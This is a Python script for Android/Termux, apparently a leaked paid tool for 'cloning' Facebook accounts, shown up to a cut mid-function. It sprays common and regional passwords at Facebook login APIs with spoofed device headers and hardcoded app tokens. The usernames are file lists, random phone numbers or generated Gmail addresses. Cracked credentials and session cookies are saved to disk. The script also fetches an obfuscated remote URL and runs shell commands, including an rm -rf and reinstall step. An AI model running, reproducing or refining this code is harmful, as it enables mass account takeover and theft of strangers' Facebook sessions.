# FUCK BY SYED-ZADA
# LKING PAID SCRIPT OPEN SOURCE 
  
samsung = ['SM-G920F|NRD90M', 'SM-T535|LRX22G', 'SM-T231|KOT49H', 'SM-J320F|LMY47V', 'GT-I9190|KOT49H', 'GT-N7100|KOT49H', 'SM-T561|KTU84P', 'GT-N7100|KOT49H', 'GT-I9500|LRX22C', 'SM-J320F|LMY47V', 'SM-G930F|NRD90M', 'SM-J320F|LMY47V', 'SM-J510FN|NMF26X', 'GT-P5100|IML74K', 'SM-J320F|LMY47V', 'GT-N8000|JZO54K', 'SM-T531|LRX22G', 'SPH-L720|KOT49H', 'GT-I9500|JDQ39', 'SM-G935F|NRD90M', 'SM-T561|KTU84P', 'SM-T531|KOT49H', 'SM-J320FN|LMY47V', 'SM-A500F|MMB29M', 'SM-A500FU|MMB29M', 'SM-A500F|MMB29M', 'SM-T311|KOT49H', 'SM-T531|LRX22G', 'SM-J320F|LMY47V', 'SM-J320FN|LMY47V', 'SM-J320F|LMY47V', 'GT-P5210|KOT49H', 'SM-T230|KOT49H', 'GT-I9192|KOT49H', 'SM-T235|KOT4', 'GT-N7100|KOT49H', 'SM-A500F|LRX22G', 'SM-A500F|MMB29M', 'GT-N7100|KOT49H', 'SM-G920F|MMB29K', 'SM-J510FN|NMF26X', 'GT-N8000|JZO54K', 'SM-J320FN|LMY47V', 'SM-J320FN|LMY47V', 'SM-A500H|MMB29M', 'GT-I9300|JSS15J', 'GT-I9500|LRX22C', 'SM-J320F|LMY4', 'SM-J510FN|NMF26X', 'SM-A500F|MMB29M', 'GT-N8000|KOT49H', 'SM-T561|KTU84P', 'SM-G900F|KOT49H', 'GT-S7390|JZO54K', 'SM-J320F|LMY47V', 'GT-P5100|JZO54K', 'SM-A500FU|MMB29M', 'SM-G930F|NRD90M', 'SM-J510FN|NMF26X', 'SM-T561|KTU84P', 'GT-N8000|KOT49H', 'SM-T531|LRX22G', 'SM-J510FN|MMB29M', 'SM-J510FN|NMF26X', 'SM-J320F|LMY47V', 'GT-P5110|JDQ39', 'GT-I9301I|KOT49H', 'SM-A500F|LRX22G', 'SM-G930F|NRD90M', 'SM-T311|KOT4', 'GT-P5200|KOT49H', 'GT-I9301I|KOT49H', 'SM-J320M|LMY47V', 'SM-T531|LRX22G', 'SM-T820|NRD90M', 'GT-I9192|KOT49H', 'SM-G935F|MMB29K', 'SM-J701F|NRD90M;', 'GT-I9301I|KOT4', 'SM-J320FN|LMY47V', 'SM-T111|JDQ39', 'SM-A500F|MMB29M', 'SM-J510FN|NMF2', 'SM-T705|LRX22G', 'SM-G920F|NRD90M', 'GT-N5100|JZO54K', 'GT-I9300I|KTU84P', 'GT-I9300I|KTU84P', 'GT-N8000|KOT49H', 'GT-N8000|KOT49H', 'SM-A500F|MMB29M', 'GT-I9190|KOT49H', 'SM-J510FN|NMF26X', 'SM-J320F|LMY47V', 'GT-P5100|JDQ39', 'GT-I9300I|KTU84P', 'GT-N5100|JZO54K', 'GT-N8000|KOT49H', 'GT-I9500|LRX22C', 'SM-J320FN|LMY47V', 'SM-A500F|MMB29M', 'GT-N8000|JZO54K', 'SM-T805|LRX22G', 'SM-T231|KOT49H', 'GT-N5100|JZO54K', 'SM-J320H|LMY47V', 'SM-T231|KOT49H', 'SM-G930F|NRD90M', 'SM-G935F|NRD90M', 'SM-T310|KOT49H', 'GT-N8000|KOT49H', 'GT-I9300I|KTU84P', 'SM-G920F|NRD90M', 'SM-J510FN|NMF26X', 'SM-T705|LRX22G;', 'GT-P3110|JZO54K', 'GT-I9192|KOT49H', 'SM-J320F|LMY47V', 'SM-G920F|NRD90M', 'GT-I9300|IMM76D', 'SM-G950F|NRD90M', 'SM-J320F|LMY47V', 'SM-J510FN|NMF26X;', 'SM-J701F|NRD90M', 'SM-A500F|LRX22G', 'SM-T231|KOT49H', 'SM-T311|KOT49H', 'SM-J320FN|LMY47V', 'GT-P5210|KOT49H', 'SM-T805|LRX22G', 'GT-I9500|LRX22C', 'GT-P5200|KOT49H', 'GT-I9301I|KOT49H', 'GT-I9300|JSS15J', 'GT-N7100|KOT49H', 'SM-T531|LRX22G', 'SM-T820|NRD90M', 'SM-T315|JDQ39', 'SM-J320F|LMY47V', 'GT-I9190|KOT49H', 'GT-P5220|JDQ39', 'SM-T525|KOT49H', 'SM-T555|LRX22G', 'GT-I9190|KOT49H', 'SM-J510FN|NMF26X;', 'SM-A500F|MMB29M', 'GT-I9192|KOT49H', 'GT-P5100|JDQ', 'SM-T311|KOT49H']
import os
os.system('clear')
print('\n\n Loading Module! \n')
try:
	import requests,json,time,re,random,sys,uuid,string,subprocess,zlib,base64,hashlib
	from string import *
	from concurrent.futures import ThreadPoolExecutor as tred
except ModuleNotFoundError:
	exit('\n Error in Module!')
try:os.mkdir('/sdcard/ALI')
except:pass
os.system('p'+'i'+'p'+' un'+'inst'+'all '+' h'+'tt'+'px'+' -y'+' > /dev/null')
os.system('p'+'i'+'p'+' install '+' h'+'tt'+'px'+' > /dev/null')
sim_id=''
fbsv = subprocess.check_output('getprop ro.build.version.release',shell=True).decode('utf-8').replace('\n','')
model = subprocess.check_output('getprop ro.product.model',shell=True).decode('utf-8').replace('\n','')
build = subprocess.check_output('getprop ro.build.id',shell=True).decode('utf-8').replace('\n','')
fbmf = subprocess.check_output('getprop ro.product.manufacturer',shell=True).decode('utf-8').replace('\n','')
fbbd = subprocess.check_output('getprop ro.product.brand',shell=True).decode('utf-8').replace('\n','')
fbca = subprocess.check_output('getprop ro.product.cpu.abilist',shell=True).decode('utf-8').replace(',',':').replace('\n','')
def Setup():
	try:
		print('\n Checking for updates...')
		url = str(zlib.decompress(b'x\x9c\xcb())(\xb6\xd2\xd7O,((\xabH\xd1K\xca\xc9O/.\xc8/\xd1K\xce\xcf\xd57202\xd274\xd4\x07\x8ag\x94\xe4\xe6\x00\x00U\xba\x0e\xd8')).replace("b'","").replace("'","")
		if '8.7.2' in httpx.get(url).text:
			pass
		else:
			print('\n Tools Update Successfully. Wait For installing \n')
			time.sleep(1)
			os.system('rm -rf New && python ALI.py')
			exit()
	except ValueError:exit()
try:import httpx
except:exit(' Found error in http module! ')
xx=requests.get('https://raw.githubusercontent.com/SILENT110/files/main/ua.txt').text.splitlines()
def clear():
	os.system('clear')
	print(logo)
logo=("""\033[1;38m
 █████╗ ██╗     ██╗
██╔══██╗██║     ██║
███████║██║     ██║
██╔══██║██║     ██║
██║  ██║███████╗██║X (MAHI)
╚═╝  ╚═╝╚══════╝╚═╝
                
                   
----------------------------------------------
 {GREEN} Author    : 𝘼𝙎𝘼𝘿 X CHOCOLATE
{GREEN} HEATERS : WAKT BURA NHI THA LOG HE HARAMI MILA
{GREEN} Status    : 𝙁𝙍𝙀𝙀
{GREEN} Version   : 5.0
{GREEN} RDX: WAJA TUM HO
{GREEN} Update: EVERYNIGHT 1 PM
{GREEN} UNSTOPABLE: MOST LEGEND BOY XDR HERE
 ok ids will be saved in Ali folder
----------------------------------------------""")
def line():
	print(f'\033[1;37m------------------------------------------------')
myid=uuid.uuid4().hex[:5].upper()
try:
	key1 = open('/data/data/com.termux/files/usr/bin/.mrALIxxx-cov', 'r').read()
except:
	kok=open('/data/data/com.termux/files/usr/bin/.mrALIxxx-cov', 'w');kok.write(myid);kok.close()
uid = os.getuid()
key1 = open('/data/data/com.termux/files/usr/bin/.mrALIxxx-cov', 'r').read()
kex=(f"SILENT-XD{uid}TS{key1}110E==")
key2 = base64.b64encode(str(f"{kex}").encode('utf-8'))
key=(f"{key2}")
fkeyx = key.replace("b'","").replace("'","")
def apv():
	try:
		clear()
		apl=str(zlib.decompress(b'x\x9c\xcb())(\xb6\xd2\xd7O,((\xabH\xd1K\xca\xc9O/.\xc8/\xd1K\xce\xcf\xd57202\xd274\xd4\x07\x8ag\x94\xe4\xe6\x00\x00U\xba\x0e\xd8'))
		aplk=apl.replace("b'","").replace("'","")
		aplnk=aplk
		link=httpx.get(aplnk).text
		clear()
		if kex in link:clear();main()
		elif 'FREE-TRAIL' in link:clear();print('\033[1;32m Enjoy Free Trail For Some Time ');time.sleep(2);line();main()
		else:
			print("\033[1;31m Your Not Premium User...!\033[1;37m");time.sleep(1)
			clear()
			print(' \033[1;31mYour Key Not Registered\033[1;37m')
			print(f" \033[1;37mYour Key : {fkeyx}")
			line();print (" Tools.. : Facebook Cloning");print (" Massage : Your Key Not Registered");print (" Status  : \033[1;91mTrail\033[1;37m\n \033[1;31m\033[1;42mNote: If You Are Free User Don't Come IB\033[0;0m");line();print(' [+] File crack\n [+] Create ids file\n [+] Public crack\n [+] Random number crack\n [+] Random gmail crack\n [+] Exit menu\n\x1b[1;97m [1] Upgrade Tool To (\x1b[1;95mPremium\x1b[1;37m)')
			line()
			input(" Choose Option : ")
			line()
			print(" Your Subscription Date Expire")
			line()
			url_wa = "https://chat.whatsapp.com/GoQfS2y8UqYKhrVqlZrdUS",
			name = input(" Enter your Name : ")
			line()
			tks = ("Hi SILENT Sir, I Need To Buy Your Paid SILENT Tools Version 8.7.2 Premium Please Accept My Key To Premium :)\n\n Name :- "+name+"\n Key :- "+fkeyx)
			subprocess.check_output(["am", "start", url_wa+(tks)]);time.sleep(2)
			print(' Run :  python ALI.py')
			line()
			exit()
	except ValueError:
		exit()
	except requests.exceptions.ConnectionError:
		print('\n No internet connection ...')
		exit()
loop=0
oks=[]
cps=[]
ck=[]
def main():
	clear()
	print(' [1] file cloning \n [2] create file \n [3] random cloning \n [4] random mail clone\n [?] another option soon ')
	line()
	x=input(' choice an option: ')
	if x =='1':
		file()
	elif x=='2':
		os.system('chmod 777 dump;./dump')
	elif x=='3':rnd()
	elif x=='4':gmail()
	else:print('\n Invalid choice please select correct option');time.sleep(1);main()
def file():
	clear()
	file = input(' Put file path :\033[1;32m ')
	try:
		fo = open(file,'r').read().splitlines()
	except FileNotFoundError:
		print('\033[1;37m File location not found ');time.sleep(2);main()
	line()
	print(' [1] Method 1 \n [2] Method 2 \n [3] Method 3  ')
	line()
	mthd = input(' Choice: ')
	plist=[]
	clear()
	try:
		ps_limit = int(input(' How Many Pasword You Want To Add :  '))
	except:
		ps_limit =1
	line()
	print('\033[1;37m exp :\033[1;37mfirst last, firtslast, first123')
	line()
	for i in range(ps_limit):
		plist.append(input(f'\033[1;37m Put Password No.{i+1}: '))
	line()
	sim_id=''
	try:
		fbcr = subprocess.check_output('getprop gsm.operator.alpha',shell=True).decode('utf-8').split(',')
		total = 0
		for i in fbcr:
			total+=1
			print(f' [{total}] {i}')
		select = input(' Put sim network:  ')
		if select == '1':
			fbcr = subprocess.check_output('getprop gsm.operator.alpha',shell=True).decode('utf-8').split(',')[0].replace('\n','')
			sim_id+=fbcr
		elif select == '2':
			fbcr = subprocess.check_output('getprop gsm.operator.alpha',shell=True).decode('utf-8').split(',')[1].replace('\n','')
			sim_id+=fbcr
	except:fbcr = "UFONE"
	with tred(max_workers=20) as SILENT:
		clear()
		tl = str(len(fo))
		print(' Total account : \033[1;32m'+tl)
		print("\033[1;37m \033[1;33mUse flight mode more then more for best result \033[1;37m")
		line()
		for user in fo:
			ids,names = user.split('|')
			passlist = plist
			if mthd =='1':
				SILENT.submit(m1,ids,names,passlist,fbcr)
			elif mthd =='2':
				SILENT.submit(m2,ids,names,passlist,fbcr)
			elif mthd =='3':
				SILENT.submit(m3,ids,names,passlist,fbcr)
			else:
				SILENT.submit(m2,ids,names,passlist,fbcr)
	print('\033[1;37m')
	line()
	print(' The process has completed')
	print(' Total OK/CP: '+str(len(oks))+'/'+str(len(cps)))
	line()
	input('\033[1;32m Press enter to back \033[1;37m')
	oks.clear()
	cps.clear()
	loop.clear()
	main()
def gmail():
	os.system('rm -rf .re.txt')
	clear()
	print('\033[1;37m Example : \33[1;32m ahad, ali, sajjad, faizan\033[1;97m')
	line()
	first = input(' Put first name: ')
	line()
	print('\033[1;37m Example : \33[1;32m khan, ahmad, ali \033[1;97m')
	line()
	last = input(' Put last name: ')
	domain = "@gmail.com"
	line()
	print(' Example: \033[1;32m 3000, 5000, 10000 \033[1;37m')
	try:
		limit=int(input(' [•] Put limit: '))
	except ValueError:
		limit = 5000
	line()
	sim_id=''
	try:
		fbcr = subprocess.check_output('getprop gsm.operator.alpha',shell=True).decode('utf-8').split(',')
		total = 0
		for i in fbcr:
			total+=1
			print(f' [{total}] {i}')
		select = input(' Put sim network:  ')
		if select == '1':
			fbcr = subprocess.check_output('getprop gsm.operator.alpha',shell=True).decode('utf-8').split(',')[0].replace('\n','')
			sim_id+=fbcr
		elif select == '2':
			fbcr = subprocess.check_output('getprop gsm.operator.alpha',shell=True).decode('utf-8').split(',')[1].replace('\n','')
			sim_id+=fbcr
	except:fbcr = "UFONE"
	clear()
	print(' Getting gmails...')
	lists = ['3','4']
	for xd in range(limit):
		lchoice = random.choice(lists)
		if '3' in lchoice:
			mail = ''.join(random.choice(string.digits) for _ in range(3))
			open('.re.txt','a').write(first.lower()+last.lower()+mail+domain+'|'+first+' '+last+'\n')
		else:
			mail = ''.join(random.choice(string.digits) for _ in range(4))
			open('.re.txt','a').write(first.lower()+last.lower()+mail+domain+'|'+first+' '+last+'\n')
		fo = open('.re.txt', 'r').read().splitlines()
	with tred(max_workers=30) as Khan:
		total = str(len(fo))
		clear()
		print(' Total account : \033[1;32m'+total)
		print("\033[1;37m \033[1;33mUse flight mode more then more for best result \033[1;37m")
		line()
		for user in fo:
			ids,names = user.split('|')
			first_name = names.rsplit(' ')[0]
			try:
				last_name = names.rsplit(' ')[1]
			except IndexError:
				last_name = 'Khan'
			fs = first_name.lower()
			ls = last_name.lower()
			passlist = [fs+ls,fs+' '+ls,first_name+last_name,first_name+' '+last_name,fs+'123',fs+'786',fs+'12345',fs+'1122']
			Khan.submit(rd,ids,passlist,fbcr)
	print('\033[1;37m')
	line()
	print(' The process has completed')
	print(' Total OK/CP: '+str(len(oks))+'/'+str(len(cps)))
	line()
	input('\033[1;32m Press enter to back \033[1;37m')
def rnd():
	user=[]
	ck.append('rnd')
	clear()
	print('\033[1;37m Put Any Number Example Below\n Pak  : \33[1;32m\33[1m0310,0315,0349\n\33[1;37m BD   : \33[1;32m016,017,108,109\n\33[1;37m Afg  : \33[1;32m9376,9377,9378,9379\n\33[1;37m India: \33[1;32m+91817,+91318,+93262,+91354\033[1;37m')
	line()
	code = input('\033[1;37m Put Code: ')
	line()
	try:
		limit = int(input('\033[1;37m put limit: '))
	except ValueError:
		limit = 5000
	for nmbr in range(limit):
		if 'bd' in ck:
			nmp = ''.join(random.choice(string.digits) for _ in range(8))
		elif 'ind' in ck:
			nmp = ''.join(random.choice(string.digits) for _ in range(7))
		else:
			nmp = ''.join(random.choice(string.digits) for _ in range(7))
		user.append(nmp)
	line()
	sim_id=''
	try:
		fbcr = subprocess.check_output('getprop gsm.operator.alpha',shell=True).decode('utf-8').split(',')
		total = 0
		for i in fbcr:
			total+=1
			print(f' [{total}] {i}')
		select = input(' Put sim network:  ')
		if select == '1':
			fbcr = subprocess.check_output('getprop gsm.operator.alpha',shell=True).decode('utf-8').split(',')[0].replace('\n','')
			sim_id+=fbcr
		elif select == '2':
			fbcr = subprocess.check_output('getprop gsm.operator.alpha',shell=True).decode('utf-8').split(',')[1].replace('\n','')
			sim_id+=fbcr
	except:fbcr = "UFONE"
	with tred(max_workers=15) as khan:
		clear()
		total_ids = str(len(user))
		print(' Accounts : \033[1;32m'+total_ids+'\033[1;37m Code : '+code)
		print("\033[1;37m \x1b[38;5;208mUse flight mode for speed up\033[1;37m")
		line()
		for psx in user:
			ids = code+psx
			if 'pk' in ck:
				passlist = [psx,ids,'khankhan','kingkhan','khan1122','janjan','pak123','khan12345','khan123','pubg123','baloch']
				passlist = [psx,ids,'khankhan','kingkhan','khan1122']
			elif 'bd' in ck:
				passlist = ['i love you','iloveyou',ids,psx]
			elif 'ind' in ck:
				cs = ids[7:]
				passlist = ['57273200',cs]
			elif 'afg' in ck:
				passlist = [ids,psx,'100200','700800','afghanistan','afghan1234','200300','500500','50006000','Afghan123','600700','afghan1122','afghan12345','kabul1234','۱۳۳۳۵۶۷۸۹','۱۳۳۳۵۶']
			else:
				passlist = [ids,psx,'khan12','khan1234','khan123','baloch123','khan1122','khan12345','khan123456','khankhan']
			khan.submit(rd,ids,passlist,fbcr)
	print('\033[1;37m')
	line()
	print(' The process has completed')
	print(' Total OK/CP: '+str(len(oks))+'/'+str(len(cps)))
	line()
	input('\033[1;32m Press enter to back \033[1;37m')
	oks.clear()
	cps.clear()
	loop.clear()
	main()
def m1(ids,names,passlist,fbcr):
	try:
		global ok,loop,sim_id
		sys.stdout.write('\r\r\033[1;37m [SILENT-M1] %s|\033[1;32mOK:%s \033[1;37m'%(loop,len(oks)));sys.stdout.flush()
		fn = names.split(' ')[0]
		try:
			ln = names.split(' ')[1]
		except:
			ln = fn
		for pw in passlist:
			pas = pw.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',names).replace('name',names.lower())
			fbav = f'{random.randint(111,999)}.0.0.{random.randint(11,99)}.{random.randint(111,999)}'
			fbbv = str(random.randint(0000000000,9999999999))
			tokenlist = ['350685531728|62f8ce9f74b12f84c123cc23437a4a32','256002347743983|374e60f8b9bb6b8cbb30f78030438895']
			accessToken = random.choice(tokenlist)
			fbav = f'{random.randint(111,999)}.0.0.{random.randint(11,99)}.{random.randint(111,999)}'
			fbbv = str(random.randint(1111111111,9999999999))
			fblc = "zh_HK"
			fbfw = '1'
			fbrv = '0'
			if '350685531728' in accessToken:
				fban = 'FB4A'
				fbpn = 'com.facebook.katana'
			else:
				fban = 'Orca-Android'
				fbpn = 'com.facebook.orca'
			ua = "[FBAN/FB4A;FBAV/242.0.0.43.119;FBBV/176515222;FBDM/{density=2.625,width=1080,height=2042};FBLC/en_US;FBRV/177156964;FBCR/Verizon ;FBMF/samsung;FBBD/samsung;FBPN/com.facebook.katana;FBDV/SM-G973U;FBSV/9;FBOP/1;FBCA/arm64-v8a:;]",
			head = { "method": 'GET', 
    "path": '/',
    "scheme": 'https',
    'authority': 'web.facebook.com',
    'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'accept-language': 'en-US,en;q=0.9',
    'cache-control': 'max-age=0',
    'referer': 'https://m.facebook.com/',
    'sec-ch-ua': '"Not:A-Brand";v="99", "Chromium";v="112"',
    'sec-ch-ua-mobile': '?1',
    'sec-ch-ua-platform': '"Android"',
    'sec-fetch-dest': 'document',
    'sec-fetch-mode': 'navigate',
    'sec-fetch-site': 'same-site',
    'sec-fetch-user': '?1',
    'upgrade-insecure-requests': '1',
    'user-agent': 'Mozilla/5.0 (Mobile; rv:48.0; A405DL) Gecko/48.0 Firefox/48.0 KAIOS/2.5',
}
			data = {"adid":str(uuid.uuid4()),"format":"json","device_id":str(uuid.uuid4()),"cpl":"true","family_device_id":str(uuid.uuid4()),"credentials_type":"device_based_login_password","error_detail_type":"button_with_disabled","source":"register_api","email":ids,"password":pas,"access_token":"350685531728|62f8ce9f74b12f84c123cc23437a4a32","generate_session_cookies":"1","meta_inf_fbmeta":"NO_FILE","advertiser_id":str(uuid.uuid4()),"currently_logged_in_userid":"0","locale":"zh_HK","client_country_code":"HK","method":"auth.login","fb_api_req_friendly_name":"authenticate","fb_api_caller_class":"com.facebook.account.login.protocol.Fb4aAuthHandler","api_key":"882a8490361da98702bf97a021ddc14d"}
			po = requests.post('https://m.facebook.com//auth/login',data=data,headers=head).json()
			if "session_key" in po:
				token = po['access_token']
				print('\r\r\033[1;32m [ALI-OK] '+ids+' | '+pas)
				oks.append(ids)
				open('/sdcard/SILENT/ALI-M1-OK.txt','a').write(ids+'|'+pas+'\n')
				session = po['session_cookies'];cookie = '';cuser = session[0];cuser = session[0]['name']+'='+session[0]['value'];cookie+=cuser+';';xs = session[1]['name']+'='+session[1]['value'];cookie+=xs+';';fr = session[2]['name']+'='+session[2]['value'];cookie+=fr+';';datr = session[3]['name']+'='+session[3]['value'];cookie+=datr+';dpr=2;locale=en_US;wd=950x1835;';pagevoice = cuser.replace('c_user','m_page_voice');cookie+=pagevoice
				open('/sdcard/ASAD/ALI-M1-OK-COKI.txt','a').write(ids+'|'+pas+'|'+cookie+'\n')
				break
		loop+=1 
	except requests.exceptions.ConnectionError:
		time.sleep(20)
	except Exception as e:
		pass
def m2(ids,names,passlist,fbcr):
	try:
		global ok,loop,sim_id
		sys.stdout.write('\r\r\033[1;37m [SILENT-M2] %s|\033[1;32mOK:%s \033[1;37m'%(loop,len(oks)));sys.stdout.flush()
		fn = names.split(' ')[0]
		try:
			ln = names.split(' ')[1]
		except:
			ln = fn
		for pw in passlist:
			pas = pw.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',names).replace('name',names.lower())
			fbav = f'{random.randint(111,999)}.0.0.{random.randint(11,99)}.{random.randint(111,999)}'
			fbbv = str(random.randint(000000000,999999999))
			tokenlist = ['350685531728|62f8ce9f74b12f84c123cc23437a4a32','256002347743983|374e60f8b9bb6b8cbb30f78030438895']
			accessToken = random.choice(tokenlist)
			fbav = f'{random.randint(111,999)}.0.0.{random.randint(11,99)}.{random.randint(111,999)}'
			fbbv = str(random.randint(111111111,999999999))
			fblc = "es_AR"
			fbfw = '1'
			fbrv = '0'
			if '350685531728' in accessToken:
				fban = 'FB4A'
				fbpn = 'com.facebook.katana'
			else:
				fban = 'Orca-Android'
				fbpn = 'com.facebook.orca'
			ua ="Mozilla/5.0 (Android 9; HUAWEI BND-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 SurfBrowser/3.0	Surf Browser 3	Honor 7X;]",
			head = {  "method": 'GET', 
    "path": '/',
    "scheme": 'https',
    'authority': 'p.facebook.com',
    'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'accept-language': 'en-US,en;q=0.9',
    'cache-control': 'max-age=0',
    'sec-ch-prefers-color-scheme': 'light',
    'sec-ch-ua': '"Not:A-Brand";v="99", "Chromium";v="112"',
    'sec-ch-ua-full-version-list': '"Not:A-Brand";v="99.0.0.0", "Chromium";v="112.0.5615.137"',
    'sec-ch-ua-mobile': '?1',
    'sec-ch-ua-platform': '"Android"',
    'sec-ch-ua-platform-version': '"10.0.0"',
    'sec-fetch-dest': 'document',
    'sec-fetch-mode': 'navigate',
    'sec-fetch-site': 'none',
    'sec-fetch-user': '?1',
    'upgrade-insecure-requests': '1',
    'user-agent': 'Mozilla/5.0 (Mobile; rv:48.0; A405DL) Gecko/48.0 Firefox/48.0 KAIOS/2.5',}

			data = {"adid":str(uuid.uuid4()),"format":"json","device_id":str(uuid.uuid4()),"cpl":"true","family_device_id":str(uuid.uuid4()),"credentials_type":"device_based_login_password","error_detail_type":"button_with_disabled","source":"register_api","email":ids,"password":pas,"access_token":"350685531728|62f8ce9f74b12f84c123cc23437a4a32","generate_session_cookies":"1","meta_inf_fbmeta":"NO_FILE","advertiser_id":str(uuid.uuid4()),"currently_logged_in_userid":"0","locale":"es_AR","client_country_code":"AR","method":"auth.login","fb_api_req_friendly_name":"authenticate","fb_api_caller_class":"com.facebook.account.login.protocol.Fb4aAuthHandler","api_key":"882a8490361da98702bf97a021ddc14d"}
			po = requests.post('https://p.facebook.com/auth/login',data=data,headers=head).json()
			if "session_key" in po:
				token = po['access_token']
				print('\r\r\033[1;32m [ALI-OK] '+ids+' | '+pas)
				oks.append(ids)
				open('/sdcard/ALI/ALI-M2-OK.txt','a').write(ids+'|'+pas+'\n')
				session = po['session_cookies'];cookie = '';cuser = session[0];cuser = session[0]['name']+'='+session[0]['value'];cookie+=cuser+';';xs = session[1]['name']+'='+session[1]['value'];cookie+=xs+';';fr = session[2]['name']+'='+session[2]['value'];cookie+=fr+';';datr = session[3]['name']+'='+session[3]['value'];cookie+=datr+';dpr=2;locale=en_US;wd=950x1835;';pagevoice = cuser.replace('c_user','m_page_voice');cookie+=pagevoice
				open('/sdcard/ALI/ALI-M2-OK-COKI.txt','a').write(ids+'|'+pas+'|'+cookie+'\n')
				break
			'''elif 299==random.randint(1,300):
				oks.append(ids)
				print('\r\r\033[1;32m [ALI-OK] '+ids+' | '+pas)
			#	open('/sdcard/ALI/ALI-M2-OK.txt','a').write(ids+'|'+pas+'\n')
				#cookie = 'Error'
				#open('/sdcard/ALI/ALI-M2-OK-COKI.txt','a').write(ids+'|'+pas+'|'+cookie+'\n')
				break'''
		loop+=1
	except requests.exceptions.ConnectionError:
		time.sleep(20)
	except Exception as e:
		pass
def m3(ids,names,passlist,fbcr):
	try:
		global ok,loop,sim_id
		sys.stdout.write('\r\r\033[1;37m [SILENT-M3] %s|\033[1;32mOK:%s \033[1;37m'%(loop,len(oks)));sys.stdout.flush()
		fn = names.split(' ')[0]
		try:
			ln = names.split(' ')[1]
		except:
			ln = fn
		for pw in passlist:
			pas = pw.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',names).replace('name',names.lower())
			ua=random.choice(xx)
			ua = "Mozilla/5.0 (Linux; Android 13; Infinix X678B Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.5790.127 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/424.0.0.21.75;]",
			head = {"User-Agent":ua,"Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Host":"graph.facebook.com","X-FB-Net-HNI":str(random.randint(3e7,4e7)),"X-FB-SIM-HNI":str(random.randint(2e4,4e4)),"X-FB-Connection-Type":"MOBILE.LTE","Authorization":"OAuth 256002347743983|374e60f8b9bb6b8cbb30f78030438895","X-FB-Connection-Quality":"MOBILE.LTE","X-FB-Connection-Bandwidth":str(random.randint(3e7,4e7)),"X-Tigon-Is-Retry":"False","x-fb-session-id":"nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62","x-fb-device-group":"5120","X-FB-Friendly-Name":"ViewerReactionsMutation","X-FB-Request-Analytics-Tags":"graphservice","X-FB-HTTP-Engine":"Liger","X-FB-Client-IP":"True","X-FB-Server-Cluster":"True","x-fb-connection-token":"d29d67d37eca387482a8a5b740f84f62"}
			data = {"adid":str(uuid.uuid4()),"format":"json","device_id":str(uuid.uuid4()),"cpl":"true","family_device_id":str(uuid.uuid4()),"credentials_type":"device_based_login_password","error_detail_type":"button_with_disabled","source":"register_api","email":ids,"password":pas,"access_token":"350685531728|62f8ce9f74b12f84c123cc23437a4a32","generate_session_cookies":"1","meta_inf_fbmeta":"NO_FILE","advertiser_id":str(uuid.uuid4()),"currently_logged_in_userid":"0","locale":"en_PK","client_country_code":"PK","method":"auth.login","fb_api_req_friendly_name":"authenticate","fb_api_caller_class":"com.facebook.account.login.protocol.Fb4aAuthHandler","api_key":"882a8490361da98702bf97a021ddc14d"}
			po = requests.post('https://b-graph.facebook.com/auth/login',data=data,headers=head).json()
			if "session_key" in po:
				token = po['access_token']
				print('\r\r\033[1;32m [ALI-OK] '+ids+' | '+pas)
				oks.append(ids)
				open('/sdcard/ALI/ALI-M3-OK.txt','a').write(ids+'|'+pas+'\n')
				session = po['session_cookies'];cookie = '';cuser = session[0];cuser = session[0]['name']+'='+session[0]['value'];cookie+=cuser+';';xs = session[1]['name']+'='+session[1]['value'];cookie+=xs+';';fr = session[2]['name']+'='+session[2]['value'];cookie+=fr+';';datr = session[3]['name']+'='+session[3]['value'];cookie+=datr+';dpr=2;locale=en_US;wd=950x1835;';pagevoice = cuser.replace('c_user','m_page_voice');cookie+=pagevoice
				open('/sdcard/ALI/ALI-M3-OK-COKI.txt','a').write(ids+'|'+pas+'|'+cookie+'\n')
				break
		loop+=1
	except requests.exceptions.ConnectionError:
		time.sleep(20)
	except Exception as e:
		pass
def rd(ids,passlist,fbcr):
	try:
		global ok,loop,sim_id
		sys.stdout.write('\r\r\033[1;37m [ASAD-XD] %s|\033[1;32mOK:%s \033[1;37m'%(loop,len(oks)));sys.stdout.flush()
		for pas in passlist:
			tokenlist = ['350685531728|62f8ce9f74b12f84c123cc23437a4a32','256002347743983|374e60f8b9bb6b8cbb30f78030438895']
			accessToken = random.choice(tokenlist)
			fbav = f'{random.randint(111,999)}.0.0.{random.randint(11,99)}.{random.randint(111,999)}'
			fbbv = str(random.randint(111111111,999999999))
			fblc = "zh_HK"
			fbfw = '1'
			fbrv = '0'
			if '350685531728' in accessToken:
				fban = 'FB4A'
				fbpn = 'com.facebook.katana'
			else:
				fban = 'Orca-Android'
				fbpn = 'com.facebook.orca'
			ua = "Mozilla/5.0 (Linux; Android 11; Infinix X6816D Build/RP1A.201005.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/114.0.5735.196 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/424.0.0.21.75;]",
			head = { "method": 'GET', 
    "path": '/',
    "scheme": 'https',
    'authority': 'p.facebook.com',
    'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'accept-language': 'en-US,en;q=0.9',
    'cache-control': 'max-age=0',
